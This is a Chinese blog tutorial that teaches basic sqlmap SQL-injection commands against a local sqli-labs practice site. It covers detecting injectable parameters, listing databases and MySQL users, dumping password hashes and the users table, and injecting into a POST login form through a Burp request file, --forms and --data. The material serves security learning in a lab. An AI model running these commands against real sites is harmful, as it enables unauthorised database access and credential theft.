SQL Map基础操作学习

SQLMAP用于mysql注入

针对http://127.0.0.1/sqli-labs-master/Less-1/学习SQL Map基础操作语句

一.检测注入点是否可用

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1"
参数:
-u:指定注入点url
结果:

图片.png

(1)注入参数ID为GET注入,注入类型有四种分别为:boolean-based blind、error-based、AND/OR time-based blind、UNION query(基于布尔的盲注、基于错误、和/或基于时间的盲注、联合查询)
(2)web应用程序技术为:PHP 5.6.31, Apache 2.4.27
(3)数据库类型为:MySQL>=5.0

如果有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --batch

二.暴库

一条命令就可以暴出该MySQL中所有数据库名称,命令如下
C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
参数:
--dbs:dbs前面有两条杠

图片.png

三.web当前使用的数据库

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db

图片.png

四.web服务器使用账户

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user

图片.png

五.列出MySQL所有用户

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --users

图片.png

六.数据库账户与密码

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords

图片.png

七.列出数据库中的表

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
参数:
-D 指定数据库
--tables 列出所有表

图片.png

八.列出表中字段

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
参数
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段

图片.png

九.暴字段内容

C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C"id,password,username" --dump
-C:指定要暴的字段
--dump:将结果导出

图片.png

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:C:\Python27\sqlmap>python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C"id,password,username" --start 1 --stop 5 --dump
参数
--start:指定开始的行
--stop:指定结束的行
此条命令的含义为:导出数据库security中的表users中的字段(id,password,Username)中的第1到第5行的数据内容。
图片.png

十 -p 指定注入参数

图片.png

十一 --dump-all 列出所有存在的数据库中的所有内容

图片.png

十二 --thread 线程

sqlmap默认是单线程,--thread 10

图片.png

十二.sqlmap运行的级别--level

sqlmap中共有七个等级,默认等级为1

0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。
等级是指测试结果的输出的详细程度,根据测试,--level等级的提高得到的效果远比-v等级提高得到的效果好,如果你想看到sqlmap发送的测试payload最好的等级就是3。

POST登陆框注入

Less-11


图片.png

注入方式一:

1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下

图片.png

2.列数据库:
C:\Python27\sqlmap>python sqlmap.py -r "C:\Users\liuxianglai\Desktop\post.txt" -p uname --dbs
-r表示加载一个文件,-p指定参数
图片.png

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]它看起来像后端DBMS是'MySQL'。 是否要跳过特定于其他DBMS的测试负载? [Y/n] 输入"Y"

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗? [Y/n] 输入"N"

POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]POST参数'uname'是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N] 输入"Y"

3.猜表
选择一个数据库,比如security
C:\Python27\sqlmap>python sqlmap.py -r "C:\Users\liuxianglai\Desktop\post.txt" -p uname -D security --tables

图片.png

4.猜列
C:\Python27\sqlmap>python sqlmap.py -r "C:\Users\liuxianglai\Desktop\post.txt" -p uname -D security -T users --columns

图片.png

注入方式二:自动搜索表单的方式

C:\Python27\sqlmap>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --forms(form表单action=" ",也就是发送给本页面自己)

图片.png

do you want to test this form? [Y/n/q]
要测试此表单吗?[Y/n/q] 输入"Y"
do you want to fill blank fields with random values? [Y/n]
是否要填充带有随机值的空白字段? [Y/n] 输入"Y"
do you want to exploit this SQL injection? [Y/n]
你想利用SQL注入? 输入"Y"

注入方式三:指定一个参数的方法

C:\Python27\sqlmap>python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/" --data "uname=1&passwd=1"

图片.png

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,384评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,845评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,148评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,640评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,731评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,712评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,703评论 3 415
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,473评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,915评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,227评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,384评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,063评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,706评论 3 324
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,302评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,531评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,321评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,248评论 2 352

推荐阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,298评论 2 22
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,041评论 0 5
  • 转自 http://www.75271.com/1228.html 基础信息 pythonsqlmap/sqlma...
    H0f_9阅读 1,546评论 0 2
  • 民国是中国武术最后一个黄金时代,一时英雄辈出风云际会。 宫宝森是一位接受了新的思想的武术家,主张武术南北融合,...
    小代琳最乖啦阅读 405评论 2 3
  • 《人去楼空、人走茶凉》 啷个理个啷 残酷的生活啊 你可知道我为何认为你残酷 可能因为我读了那些书 书里记载的故事我...
    幽九天独步阅读 394评论 0 1